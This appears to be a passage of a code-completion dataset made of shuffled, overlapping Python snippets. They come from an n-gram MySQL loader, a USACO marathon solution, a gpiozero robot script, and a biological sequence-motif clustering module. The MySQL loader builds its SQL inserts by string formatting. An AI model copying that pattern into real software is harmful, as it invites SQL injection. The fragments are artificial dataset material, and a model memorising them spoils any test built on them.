"622009+5 # count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as",
"= pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with",
"open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count = count +1 if count",
"words.split(' ') under_word = content[0] after_word = content[1] punishment = '-99' sql =",
"= db.cursor() # ngram_stop = 622009+5 # count = 0 # with open(",
"# password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop =",
"= count + 1 # if count > (622009+5): # break # if",
"# db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', #",
"as file: for line in file: count = count +1 if count >=622017",
"if count > (622009+5): # break # if count >=6 and count <=",
"# port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor =",
") as file: # for line in file: # count = count +",
"# charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5 # count =",
"into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql)",
"db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8')",
"count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams',",
"content[0] words = content[1] content = words.split(' ') under_word = content[0] after_word =",
"'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment)",
"# for line in file: # count = count + 1 # if",
"and count <= 213054597: content = line.split('\\t') possibility = content[0] words = content[1]",
"# cursor = db.cursor() # ngram_stop = 622009+5 # count = 0 #",
"sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word,",
"1 # if count > (622009+5): # break # if count >=6 and",
"in file: count = count +1 if count >=622017 and count <= 213054597:",
"= 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for",
"'/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in file: # count =",
"for line in file: count = count +1 if count >=622017 and count",
"import traceback import pymysql if __name__ == \"__main__\": # # ngram_1 # try:",
"try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count",
"\"__main__\": # # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306, #",
"break # if count >=6 and count <= (622009+5): # ngram_2 try: db",
"= line.split('\\t') possibility = content[0] words = content[1] content = words.split(' ') under_word",
"count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count = count",
"= content[1] punishment = '-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word,",
"content[0] after_word = content[1] punishment = '-99' sql = 'insert into ngram_2 (",
"open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in file: #",
"port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor()",
"count > (622009+5): # break # if count >=6 and count <= (622009+5):",
"count >=622017 and count <= 213054597: content = line.split('\\t') possibility = content[0] words",
"(622009+5): # break # if count >=6 and count <= (622009+5): # ngram_2",
"main import traceback import pymysql if __name__ == \"__main__\": # # ngram_1 #",
"# with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in",
"cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file:",
"ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex:",
"# db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5 #",
"0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line",
"file: count = count +1 if count >=622017 and count <= 213054597: content",
"= 622009+5 # count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # )",
"file: for line in file: count = count +1 if count >=622017 and",
"line.split('\\t') possibility = content[0] words = content[1] content = words.split(' ') under_word =",
"= content[0] words = content[1] content = words.split(' ') under_word = content[0] after_word",
"count = count + 1 # if count > (622009+5): # break #",
"cursor = db.cursor() # ngram_stop = 622009+5 # count = 0 # with",
"<= 213054597: content = line.split('\\t') possibility = content[0] words = content[1] content ="
] |
[
"sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum",
"########## import sys # Reads in the file marathon.in. def readin(): f =",
"min: min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min) + \"\\n\") g.close()",
"the supposedly \"Manhattan\" distance of the list. def checkSum(L): sum = 0 i",
"temp = l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp) i+= 1",
"in temp] checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints) min =",
"int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1]",
"min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min) + \"\\n\") g.close() main()",
"i < int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0])",
"int(l[0]): #makes checkpoints into a 2D list temp = l[i].split() temp = [int(el)",
"for el in temp] checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints)",
"i = 1 total = checkSum(checkpoints) min = total while i < int(l[0])",
"main(): l = readin() checkpoints = [] i = 1 while i <=",
"while i < int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0] -",
"abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function",
"# Reads in the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s =",
"= 1 while i <= int(l[0]): #makes checkpoints into a 2D list temp",
"- 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1",
"i <= int(l[0]): #makes checkpoints into a 2D list temp = l[i].split() temp",
"+= (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works:",
"i+= 1 return sum #Main function def main(): l = readin() checkpoints =",
"supposedly \"Manhattan\" distance of the list. def checkSum(L): sum = 0 i =",
"Checks the supposedly \"Manhattan\" distance of the list. def checkSum(L): sum = 0",
"1 while i <= int(l[0]): #makes checkpoints into a 2D list temp =",
"care of the missing checkpoint Bessie skips. if total1 < min: min =",
"+ abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function def main(): l",
"= f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\" distance of the",
"return sum #Main function def main(): l = readin() checkpoints = [] i",
"- checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] -",
"missing checkpoint Bessie skips. if total1 < min: min = total1 i+= 1",
"2D list temp = l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp)",
"checkpoint Bessie skips. if total1 < min: min = total1 i+= 1 g",
"marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s #",
"the distance between the checkpoints before and after. This will take care of",
"PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys #",
"Bessie skips. if total1 < min: min = total1 i+= 1 g =",
"i < len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] -",
"0 while i < len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) +",
"checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] -",
"1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys",
"i+= 1 i = 1 total = checkSum(checkpoints) min = total while i",
"- checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The",
"- L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function def",
"sum = 0 i = 0 while i < len(L) - 1: sum",
"into a 2D list temp = l[i].split() temp = [int(el) for el in",
"The way this works: take the original total, and subtract the distances to",
"of the missing checkpoint Bessie skips. if total1 < min: min = total1",
"total = checkSum(checkpoints) min = total while i < int(l[0]) - 1: total1",
"- L[i+1][1]) i+= 1 return sum #Main function def main(): l = readin()",
"the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return",
"= 0 while i < len(L) - 1: sum += abs(L[i][0] - L[i+1][0])",
"BY <NAME> # PYTHON 2.7.6 ########## import sys # Reads in the file",
"= readin() checkpoints = [] i = 1 while i <= int(l[0]): #makes",
"= [int(el) for el in temp] checkpoints.append(temp) i+= 1 i = 1 total",
"[int(el) for el in temp] checkpoints.append(temp) i+= 1 i = 1 total =",
"Reads in the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\")",
"= 1 total = checkSum(checkpoints) min = total while i < int(l[0]) -",
"certain checkpoint. Then add the distance between the checkpoints before and after. This",
"works: take the original total, and subtract the distances to and from a",
"l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp) i+= 1 i =",
"1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return",
"# PYTHON 2.7.6 ########## import sys # Reads in the file marathon.in. def",
"abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take the original total, and",
"subtract the distances to and from a certain checkpoint. Then add the distance",
"and after. This will take care of the missing checkpoint Bessie skips. if",
"checkSum(L): sum = 0 i = 0 while i < len(L) - 1:",
"= total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0]",
"el in temp] checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints) min",
"and subtract the distances to and from a certain checkpoint. Then add the",
"<NAME> # PYTHON 2.7.6 ########## import sys # Reads in the file marathon.in.",
"- checkpoints[i-1][1])) # The way this works: take the original total, and subtract",
"- 1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] -",
"< min: min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min) + \"\\n\")",
"after. This will take care of the missing checkpoint Bessie skips. if total1",
"checkpoints[i-1][1])) # The way this works: take the original total, and subtract the",
"temp] checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints) min = total",
"this works: take the original total, and subtract the distances to and from",
"original total, and subtract the distances to and from a certain checkpoint. Then",
"to and from a certain checkpoint. Then add the distance between the checkpoints",
"the missing checkpoint Bessie skips. if total1 < min: min = total1 i+=",
"total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) +",
"while i <= int(l[0]): #makes checkpoints into a 2D list temp = l[i].split()",
"= 0 i = 0 while i < len(L) - 1: sum +=",
"l = readin() checkpoints = [] i = 1 while i <= int(l[0]):",
"+ abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1]))",
"= total while i < int(l[0]) - 1: total1 = total total1 -=",
"while i < len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1]",
"total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] -",
"0 i = 0 while i < len(L) - 1: sum += abs(L[i][0]",
"skips. if total1 < min: min = total1 i+= 1 g = open(\"marathon.out\",'w')",
"< len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1])",
"1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1])",
"f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\" distance of the list.",
"total1 < min: min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min) +",
"SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys # Reads in the",
"import sys # Reads in the file marathon.in. def readin(): f = open(\"marathon.in\",'r')",
"the original total, and subtract the distances to and from a certain checkpoint.",
"1 i = 1 total = checkSum(checkpoints) min = total while i <",
"= l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp) i+= 1 i",
"the checkpoints before and after. This will take care of the missing checkpoint",
"list. def checkSum(L): sum = 0 i = 0 while i < len(L)",
"s = f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\" distance of",
"way this works: take the original total, and subtract the distances to and",
"+ abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take the original total,",
"<= int(l[0]): #makes checkpoints into a 2D list temp = l[i].split() temp =",
"len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+=",
"2.7.6 ########## import sys # Reads in the file marathon.in. def readin(): f",
"abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 +=",
"# The way this works: take the original total, and subtract the distances",
"and from a certain checkpoint. Then add the distance between the checkpoints before",
"between the checkpoints before and after. This will take care of the missing",
"total while i < int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0]",
"= [] i = 1 while i <= int(l[0]): #makes checkpoints into a",
"# Checks the supposedly \"Manhattan\" distance of the list. def checkSum(L): sum =",
"before and after. This will take care of the missing checkpoint Bessie skips.",
"Then add the distance between the checkpoints before and after. This will take",
"the distances to and from a certain checkpoint. Then add the distance between",
"abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) +",
"checkpoints before and after. This will take care of the missing checkpoint Bessie",
"PYTHON 2.7.6 ########## import sys # Reads in the file marathon.in. def readin():",
"open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\" distance",
"if total1 < min: min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min)",
"take the original total, and subtract the distances to and from a certain",
"# USACO CONTEST 1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6",
"the list. def checkSum(L): sum = 0 i = 0 while i <",
"checkpoint. Then add the distance between the checkpoints before and after. This will",
"checkpoints = [] i = 1 while i <= int(l[0]): #makes checkpoints into",
"file marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s",
"sys # Reads in the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s",
"1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys # Reads",
"#Main function def main(): l = readin() checkpoints = [] i = 1",
"total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0])",
"def checkSum(L): sum = 0 i = 0 while i < len(L) -",
"def main(): l = readin() checkpoints = [] i = 1 while i",
"list temp = l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp) i+=",
"distances to and from a certain checkpoint. Then add the distance between the",
"CONTEST 1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import",
"-= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) +",
"i = 1 while i <= int(l[0]): #makes checkpoints into a 2D list",
"\"Manhattan\" distance of the list. def checkSum(L): sum = 0 i = 0",
"This will take care of the missing checkpoint Bessie skips. if total1 <",
"checkpoints into a 2D list temp = l[i].split() temp = [int(el) for el",
"[] i = 1 while i <= int(l[0]): #makes checkpoints into a 2D",
"1 return sum #Main function def main(): l = readin() checkpoints = []",
"#makes checkpoints into a 2D list temp = l[i].split() temp = [int(el) for",
"+ abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1",
"checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way",
"def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks",
"total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this",
"function def main(): l = readin() checkpoints = [] i = 1 while",
"return s # Checks the supposedly \"Manhattan\" distance of the list. def checkSum(L):",
"- checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1]",
"checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take the original",
"a certain checkpoint. Then add the distance between the checkpoints before and after.",
"i = 0 while i < len(L) - 1: sum += abs(L[i][0] -",
"distance of the list. def checkSum(L): sum = 0 i = 0 while",
"in the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close()",
"= open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\"",
"of the list. def checkSum(L): sum = 0 i = 0 while i",
"+= abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main",
"checkSum(checkpoints) min = total while i < int(l[0]) - 1: total1 = total",
"USACO CONTEST 1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ##########",
"# SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys # Reads in",
"checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints) min = total while",
"1 total = checkSum(checkpoints) min = total while i < int(l[0]) - 1:",
"take care of the missing checkpoint Bessie skips. if total1 < min: min",
"from a certain checkpoint. Then add the distance between the checkpoints before and",
"will take care of the missing checkpoint Bessie skips. if total1 < min:",
"sum #Main function def main(): l = readin() checkpoints = [] i =",
"- checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take the",
"L[i+1][1]) i+= 1 return sum #Main function def main(): l = readin() checkpoints",
"f.close() return s # Checks the supposedly \"Manhattan\" distance of the list. def",
"checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1]))",
"distance between the checkpoints before and after. This will take care of the",
"s # Checks the supposedly \"Manhattan\" distance of the list. def checkSum(L): sum",
"abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) #",
"temp = [int(el) for el in temp] checkpoints.append(temp) i+= 1 i = 1",
"########## # USACO CONTEST 1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON",
"L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function def main():",
"min = total while i < int(l[0]) - 1: total1 = total total1",
"+ abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0])",
"- checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0]",
"(abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1]",
"< int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) +",
"a 2D list temp = l[i].split() temp = [int(el) for el in temp]",
"checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] -",
"total, and subtract the distances to and from a certain checkpoint. Then add",
"add the distance between the checkpoints before and after. This will take care",
"readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks the",
"= checkSum(checkpoints) min = total while i < int(l[0]) - 1: total1 =",
"(abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take",
"f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks the supposedly",
"readin() checkpoints = [] i = 1 while i <= int(l[0]): #makes checkpoints",
"abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function def main(): l ="
] |
[
"pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward",
"14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward pir.when_no_motion = robot.stop pause()",
"robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward pir.when_no_motion",
"import Robot, Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17,",
"signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion",
"Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir",
"Robot, Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18))",
"from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5)",
"Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward pir.when_no_motion = robot.stop",
"MotionSensor from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir =",
"gpiozero import Robot, Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4, 14),",
"from gpiozero import Robot, Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4,",
"= Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward pir.when_no_motion =",
"import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion ="
] |
[
"seperating headers headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord = []",
"wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, #",
"logger.debug('Predicting') start_time = time.time() scores_items = [] for i, p in enumerate(results): loc_start_time",
"instance in i d_ij = [] for c_i in centers[i]: for c_j in",
"in zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet),",
"for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in",
"+ 1] width = end - start val = sum(sig[start:end]) yield val, start,",
"np.vstack(cluster) score = 0 to_be_removed = [] for i, row in enumerate(cluster.T): c",
"%.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds =",
"plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i",
"motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size)",
"is a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import",
"wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif",
"format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10,",
"items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs ==",
"self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True",
"time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import",
"= first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths",
"save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self,",
"motives], reverse=True): info = '#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts",
"estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters",
"show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme",
"orig_header header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score) header",
"= multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0])",
"regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs,",
"subarrays_item d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f",
"str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was selected.",
"for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0]",
"if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr",
"resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type",
"d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for",
"yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in",
"exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs,",
"distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i,",
"_motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring",
"self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1",
"header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores)",
"% (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None",
"%.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences):",
"sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s' %",
"info = ' - average location: %.1f +- %.1f' % (av, st) txt.append(info)",
"= class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self,",
"pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator",
">= freq_th: if std_th is None or std <= std_th: _motives[cluster_id] = motives[cluster_id]",
"regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info =",
"for rel_nw_score, i, j in ms: if motives.get(i, None) and motives.get(j, None): n_i",
"None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for",
"if float(val) / dim >= min_freq: score += 1 trimmed_align_seqs = [] for",
"similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value)",
"plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw()",
"np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig,",
